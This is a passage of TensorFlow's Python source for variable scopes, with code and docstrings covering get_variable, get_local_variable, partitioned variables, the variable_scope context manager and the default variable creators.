v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(), name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
new variables are always created unless an EagerVariableStore or
template is currently active.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is
not inherited, and it only takes effect for once when creating. You
should only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if self._graph_context_manager is not None:
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _compute_slice_dim_and_shape(full_shape, slicing):
"""Computes which dimension is being sliced and the typical slice shape."""
slice_shape = [0] * len(full_shape)
slice_dim = None
for dim, num_slices in enumerate(slicing):
dim_size = full_shape[dim]
if num_slices <= 0 or dim_size < num_slices:
raise ValueError("Cannot create %d slices for size %d. shape: %s, "
"slicing: %s" %
(num_slices, full_shape[dim], full_shape, slicing))
if num_slices == 1:
# Not slicing in this dimension.
slice_shape[dim] = dim_size
elif slice_dim is not None:
# We only support slicing along one of the dimensions.
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, slicing: %s" % (full_shape, slicing))
else:
# Note: We will add any extras onto the last slice, later.
slice_dim = dim
slice_shape[dim] = dim_size // num_slices
# Degenerate case: If "slicing" was all ones, pretend we are slicing along
# the first dimension.
if slice_dim is None:
slice_dim = 0
return slice_dim, slice_shape
def _get_trainable_value(synchronization, trainable):
"""Computes the trainable value based on the given arguments."""
if synchronization == VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
return trainable
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
else:
return variables.RefVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
expected_shape=expected_shape, import_scope=import_scope)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
validate_shape=validate_shape, caching_device=caching_device,
name=name, dtype=dtype, constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
